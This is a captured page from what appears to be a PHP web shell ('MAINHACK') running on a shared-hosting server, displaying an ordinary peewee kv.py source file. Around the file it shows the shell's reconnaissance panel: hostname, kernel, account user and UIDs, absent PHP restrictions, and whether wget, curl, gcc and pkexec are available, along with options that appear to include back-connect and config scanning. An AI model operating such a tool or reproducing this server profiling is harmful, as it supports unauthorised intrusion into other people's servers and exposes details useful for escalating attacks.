[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: kv.py
File is not writable. Editing disabled.
import operator from peewee import * from peewee import sqlite3 from peewee import Expression from playhouse.fields import PickleField try: from playhouse.sqlite_ext import CSqliteExtDatabase as SqliteExtDatabase except ImportError: from playhouse.sqlite_ext import SqliteExtDatabase Sentinel = type('Sentinel', (object,), {}) class KeyValue(object): """ Persistent dictionary. :param Field key_field: field to use for key. Defaults to CharField. :param Field value_field: field to use for value. Defaults to PickleField. :param bool ordered: data should be returned in key-sorted order. :param Database database: database where key/value data is stored. :param str table_name: table name for data. """ def __init__(self, key_field=None, value_field=None, ordered=False, database=None, table_name='keyvalue'): if key_field is None: key_field = CharField(max_length=255, primary_key=True) if not key_field.primary_key: raise ValueError('key_field must have primary_key=True.') if value_field is None: value_field = PickleField() self._key_field = key_field self._value_field = value_field self._ordered = ordered self._database = database or SqliteExtDatabase(':memory:') self._table_name = table_name support_on_conflict = (isinstance(self._database, PostgresqlDatabase) or (isinstance(self._database, SqliteDatabase) and self._database.server_version >= (3, 24))) if support_on_conflict: self.upsert = self._postgres_upsert self.update = self._postgres_update else: self.upsert = self._upsert self.update = self._update self.model = self.create_model() self.key = self.model.key self.value = self.model.value # Ensure table exists. self.model.create_table() def create_model(self): class KeyValue(Model): key = self._key_field value = self._value_field class Meta: database = self._database table_name = self._table_name return KeyValue def query(self, *select): query = self.model.select(*select).tuples() if self._ordered: query = query.order_by(self.key) return query def convert_expression(self, expr): if not isinstance(expr, Expression): return (self.key == expr), True return expr, False def __contains__(self, key): expr, _ = self.convert_expression(key) return self.model.select().where(expr).exists() def __len__(self): return len(self.model) def __getitem__(self, expr): converted, is_single = self.convert_expression(expr) query = self.query(self.value).where(converted) item_getter = operator.itemgetter(0) result = [item_getter(row) for row in query] if len(result) == 0 and is_single: raise KeyError(expr) elif is_single: return result[0] return result def _upsert(self, key, value): (self.model .insert(key=key, value=value) .on_conflict('replace') .execute()) def _postgres_upsert(self, key, value): (self.model .insert(key=key, value=value) .on_conflict(conflict_target=[self.key], preserve=[self.value]) .execute()) def __setitem__(self, expr, value): if isinstance(expr, Expression): self.model.update(value=value).where(expr).execute() else: self.upsert(expr, value) def __delitem__(self, expr): converted, _ = self.convert_expression(expr) self.model.delete().where(converted).execute() def __iter__(self): return iter(self.query().execute()) def keys(self): return map(operator.itemgetter(0), self.query(self.key)) def values(self): return map(operator.itemgetter(0), self.query(self.value)) def items(self): return iter(self.query().execute()) def _update(self, __data=None, **mapping): if __data is not None: mapping.update(__data) return (self.model .insert_many(list(mapping.items()), fields=[self.key, self.value]) .on_conflict('replace') .execute()) def _postgres_update(self, __data=None, **mapping): if __data is not None: mapping.update(__data) return (self.model .insert_many(list(mapping.items()), fields=[self.key, self.value]) .on_conflict(conflict_target=[self.key], preserve=[self.value]) .execute()) def get(self, key, default=None): try: return self[key] except KeyError: return default def setdefault(self, key, default=None): try: return self[key] except KeyError: self[key] = default return default def pop(self, key, default=Sentinel): with self._database.atomic(): try: result = self[key] except KeyError: if default is Sentinel: raise return default del self[key] return result def clear(self): self.model.delete().execute()
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.05 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A